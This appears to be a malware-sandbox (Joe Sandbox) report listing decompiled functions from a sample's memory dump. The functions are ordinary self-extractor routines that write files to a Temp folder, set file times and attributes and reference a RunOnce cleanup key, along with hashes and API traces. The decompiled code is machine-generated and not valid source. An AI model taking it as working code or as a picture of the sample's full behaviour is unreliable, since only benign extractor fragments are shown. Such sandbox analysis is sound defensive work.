Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
API String ID: 849931509-2968168367
Opcode ID: 57a2e65e823c9b76f601b047037e962d746ad5697f3900e0240150cb009071a3
Instruction ID: 595c3589b6781b021a57ecd4cc783fa3fbe896b3fb5801bacec0fdb30b7fc9dc
Opcode Fuzzy Hash: 57a2e65e823c9b76f601b047037e962d746ad5697f3900e0240150cb009071a3
Instruction Fuzzy Hash: C8E01A7156031CBBDB218F90BC0EF79FA2AE701BD0F5001B8BA08A00A0EF615A28D605

Uniqueness

Uniqueness Score: -1.00%

Function 002F4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E002F4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x2f8004; // 0x404cc811
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x2f91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E002F4E99(_t75);
						L35:
						return E002F6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x2f8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x2f91e4;
						_t58 = 0x2f91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x2f91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x2f91e4;
						_t30 = E002F4702( &_v268, 0x2f91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E002F476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E002F4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E002F47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x2f93f4 =  *0x2f93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x2f91e4;
						_t63 = 0x2f91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x2f91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x2f91e4;
						_t30 = E002F4702( &_v268, 0x2f91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E002F4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E002F4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E002F4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x002f4cd0
0x002f4cdb
0x002f4ce0
0x002f4ce2
0x002f4cee
0x002f4cf2
0x002f4d0e
0x002f4d0e
0x002f4d11
0x002f4e83
0x002f4e88
0x002f4e98
0x002f4e98
0x002f4d17
0x002f4d17
0x002f4d1a
0x002f4d2f
0x002f4d2f
0x00000000
0x002f4d2f
0x002f4d1c
0x002f4d1c
0x002f4d1f
0x002f4dcb
0x002f4dd0
0x002f4dd2
0x002f4ddd
0x002f4ddd
0x002f4de3
0x002f4de8
0x002f4ded
0x002f4ded
0x002f4def
0x002f4df0
0x002f4df0
0x002f4df4
0x002f4df4
0x002f4df6
0x002f4df9
0x002f4dfc
0x002f4dfc
0x002f4dfe
0x002f4dff
0x002f4dff
0x002f4e03
0x002f4e08
0x002f4e0a
0x002f4e0f
0x002f4d03
0x002f4d03
0x00000000
0x002f4d03
0x002f4e18
0x002f4e20
0x002f4e25
0x002f4e27
0x00000000
0x00000000
0x002f4e33
0x002f4e38
0x002f4e3a
0x00000000
0x00000000
0x002f4e40
0x002f4e51
0x002f4e56
0x002f4e5b
0x002f4e5e
0x00000000
0x00000000
0x002f4e6a
0x002f4e6f
0x002f4e71
0x00000000
0x00000000
0x002f4e77
0x002f4e7d
0x00000000
0x002f4e7d
0x002f4d25
0x002f4d25
0x002f4d28
0x002f4d36
0x002f4d3b
0x002f4d40
0x002f4d40
0x002f4d42
0x002f4d43
0x002f4d43
0x002f4d47
0x002f4d4a
0x002f4d4a
0x002f4d4c
0x002f4d4f
0x002f4d4f
0x002f4d51
0x002f4d52
0x002f4d52
0x002f4d56
0x002f4d5b
0x002f4d5d
0x002f4d62
0x00000000
0x00000000
0x002f4d67
0x002f4d6f
0x002f4d74
0x002f4d76
0x00000000
0x00000000
0x002f4d7c
0x002f4d84
0x002f4d89
0x002f4d8b
0x00000000
0x00000000
0x002f4d94
0x002f4d99
0x002f4d9e
0x002f4da1
0x002f4daa
0x002f4daa
0x002f4da3
0x002f4da3
0x002f4da3
0x002f4db5
0x002f4dbb
0x002f4dbd
0x00000000
0x002f4dc3
0x002f4dc5
0x00000000
0x002f4dc5
0x002f4dbd
0x002f4d2a
0x002f4d2a
0x002f4d2d
0x00000000
0x00000000
0x00000000
0x002f4d2d
0x002f4cf8
0x002f4cfd
0x002f4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 002F4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 002F4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F4D36, 002F4DE3

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 3625706803-3249786385
Opcode ID: 0bac595eb4511cfab870c8b33b309775d4c14d21b2e7d0da666f2c85505ddb4b
Instruction ID: 140a961997a1d4b55b8ac6b62cfb086955b5b421826ec8c023a52eb6b0a3a368
Opcode Fuzzy Hash: 0bac595eb4511cfab870c8b33b309775d4c14d21b2e7d0da666f2c85505ddb4b
Instruction Fuzzy Hash: 8741573522010E87CB24BF28DC08AB7F3A4EB457C0B044678DA8697285DBF1EE66CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002F4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x2f8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x2f8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x002f4c40
0x002f4c4a
0x002f4c8d
0x00000000
0x002f4c70
0x002f4c70
0x002f4c7e
0x002f4c86
0x00000000
0x00000000
0x00000000
0x002f4c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 002F4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002F4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 002F4C7E

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: d506994bac7bbb6491428a92e95cfc02a29c9d182b1de686464373662f78ed6c
Instruction ID: 64f7ac29796213c41ed0174185bfd5432e25f4e9a92f57f38600fb886bf64be8
Opcode Fuzzy Hash: d506994bac7bbb6491428a92e95cfc02a29c9d182b1de686464373662f78ed6c
Instruction Fuzzy Hash: A5F0627251110DAA9B14AFB4DC49DBBB7ACEB04290744453BA919C1050EA70D928C760

Uniqueness

Uniqueness Score: -1.00%

Function 002F487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E002F487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E002F490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x002f4880
0x002f488c
0x002f4894
0x002f48a0
0x002f48c9
0x002f48ce
0x002f48a2
0x002f48a8
0x002f48b7
0x002f48bc
0x002f48aa
0x002f48ac
0x002f48ac
0x002f48a8
0x002f48de
0x002f48e7
0x002f490b
0x002f48ee
0x002f48f0
0x00000000
0x002f4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,002F4A23,?,002F4F67,*MEMCAB,00008000,00000180), ref: 002F48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,002F4F67,*MEMCAB,00008000,00000180), ref: 002F4902

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8146c70d7d0f7612cdb3a8d14651a44db3a8afc714c9ffd08f306850fdeef512
Instruction ID: ef247f011443b54957e233a28d075c4e90ac646ed3caefa911e3d782ec3f50b6
Opcode Fuzzy Hash: 8146c70d7d0f7612cdb3a8d14651a44db3a8afc714c9ffd08f306850fdeef512
Instruction Fuzzy Hash: 61014BA3E2257826F32460395C89FB7951CCB96BB4F1B0335BEAAE71D1D5A45C1481E0

Uniqueness

Uniqueness Score: -1.00%

Function 002F4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E002F4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x2f858c; // 0x268
				_t9 = E002F3680(_t20);
				if( *0x2f91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x2f8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x2f9400; // 0x56200
							_t15 = _t14 + _t25;
							 *0x2f9400 = _t15;
							if( *0x2f8184 != 0) {
								_t21 =  *0x2f8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x2f93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x002f4ad5
0x002f4adb
0x002f4ae7
0x002f4aee
0x002f4b05
0x002f4b0d
0x002f4b14
0x002f4b1a
0x002f4b1c
0x002f4b21
0x002f4b2a
0x002f4b2f
0x002f4b31
0x002f4b39
0x002f4b54
0x002f4b54
0x002f4b39
0x002f4b2f
0x002f4b0f
0x002f4b0f
0x002f4b0f
0x002f4b5e
0x002f4ae9
0x002f4aed
0x002f4aed

APIs

Part of subcall function 002F3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 002F369F
Part of subcall function 002F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36B2
Part of subcall function 002F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002F36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 002F4B05

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 24cdd3d48b9e03746755bb751e84e57b3489b0a8eeb56eba090ce690d35e1857
Instruction ID: 7ebea763b8e810f0ff5435d60960a5fdd463ebe142b2f303d2af9225c62c933d
Opcode Fuzzy Hash: 24cdd3d48b9e03746755bb751e84e57b3489b0a8eeb56eba090ce690d35e1857
Instruction Fuzzy Hash: 57018031610209ABD7149F68EC09FB7B759AB447B9F048235FA39972F1CBB0D861CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002F658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x2f8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x2f8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E002F16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x002f6592
0x002f6594
0x002f6596
0x002f6598
0x002f6598
0x002f659b
0x002f659b
0x002f659d
0x002f659e
0x002f65a2
0x002f65a4
0x002f65a9
0x002f65b2
0x002f65b6
0x002f65ba
0x002f65c3
0x002f65c5
0x002f65c8
0x002f65c8
0x002f65c3
0x002f65c9
0x002f65cc
0x002f65d2
0x002f65d1
0x002f65d1
0x00000000
0x002f65dc
0x00000000

APIs

CharPrevA.USER32(002F8B3E,002F8B3F,00000001,002F8B3E,-00000003,?,002F60EC,002F1140,?), ref: 002F65BA

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 1fd71b2357ddd44a9511d407068db38720f07696613ba280b536312b9e869191
Instruction ID: b7e56df255f301d1abb8d657d8639a9ccf95d24fbd0b15063d01c3c6cac59b75
Opcode Fuzzy Hash: 1fd71b2357ddd44a9511d407068db38720f07696613ba280b536312b9e869191
Instruction Fuzzy Hash: F1F07D321142599BD7310919988CB76FFCEDB863D0F54017AEADEE3205CA954C1182A0

Uniqueness

Uniqueness Score: -1.00%

Function 002F621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E002F621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x2f8004; // 0x404cc811
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E002F597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E002F44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x2f9124 = E002F6285();
					_t9 = 0;
				}
				return E002F6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x002f6229
0x002f6230
0x002f6247
0x002f626a
0x002f6272
0x002f6249
0x002f6255
0x002f625f
0x002f6264
0x002f6264
0x002f6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 002F623F

Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554

Part of subcall function 002F6285: GetLastError.KERNEL32(002F5BBC), ref: 002F6285

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 79b916ec6ebc45ec8e1e716b7799ea2e64cbd7962fe3757d4458babb68490588
Instruction ID: 00cfb7c19fd4c3e3a92fdda03063fbe20f98fbef837f100c36cbc2ca119587eb
Opcode Fuzzy Hash: 79b916ec6ebc45ec8e1e716b7799ea2e64cbd7962fe3757d4458babb68490588
Instruction Fuzzy Hash: 86F0B4B061020C6BD750EB74AD0AFBAB2A8DB54780F40047AAA89D6181DDB49D64CA50

Uniqueness

Uniqueness Score: -1.00%

Function 002F4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x2f8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x2f8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x2f8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x2f8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x2f8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x2f8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x2f8d6c)) = 0;
				return 0;
			}

0x002f4b66
0x002f4b74
0x002f4b98
0x002f4ba0
0x00000000
0x002f4bac
0x002f4ba4
0x00000000
0x002f4ba4
0x002f4b78
0x002f4b7e
0x002f4b84
0x002f4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,002F4FA1,00000000), ref: 002F4B98

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 1ffb512a0370dc96736cb5334dc3c60d70f46075c701985d37c0836792a2dfe0
Instruction ID: 6e2172765db829b50337a06b1fa90e13476cb614ca462eaf8c9ad076fbd745ad
Opcode Fuzzy Hash: 1ffb512a0370dc96736cb5334dc3c60d70f46075c701985d37c0836792a2dfe0
Instruction Fuzzy Hash: D5F0DA71910B0CDE47A19E39D808B73FBE4AE953E1310093AD57ED2191EA70A451CA90

Uniqueness

Uniqueness Score: -1.00%

Function 002F66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x002f66b1
0x002f66ba
0x002f66c7
0x002f66bc
0x002f66be
0x002f66be

APIs

GetFileAttributesA.KERNELBASE(?,002F4777,?,002F4E38,?), ref: 002F66B1

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f3f82e5f0d500d8dcc376bbc8ebc48cee16479ac46b6f271e1106792e04a7460
Instruction ID: 69a2160f0ef3a9022f41e612b7d8e50170aad89ca30313c9a01a1d7277231164
Opcode Fuzzy Hash: f3f82e5f0d500d8dcc376bbc8ebc48cee16479ac46b6f271e1106792e04a7460
Instruction Fuzzy Hash: E3B092B623244A426A200A317C2D6662945E6C127A7E41BA4F136C11E0CE3EC856D008

Uniqueness

Uniqueness Score: -1.00%

Function 002F4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x002f4caa
0x002f4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 002F4CAA

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 32e2cbea63be8539dea2f9990e055b757337438bfa6c7033ac82efe2844f0d35
Instruction ID: 9fedae4c5aa4413cae20b1ad0df4c20f6a8a5ee653cc5655cad342b5d0e90af7
Opcode Fuzzy Hash: 32e2cbea63be8539dea2f9990e055b757337438bfa6c7033ac82efe2844f0d35
Instruction Fuzzy Hash: 53B09232044208B7CB001A82B809F953F19E7846A1F140010F60C450908A629410869A

Uniqueness

Uniqueness Score: -1.00%

Function 002F4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002F4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x002f4cc8
0x002f4ccf

APIs

GlobalFree.KERNELBASE ref: 002F4CC8

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
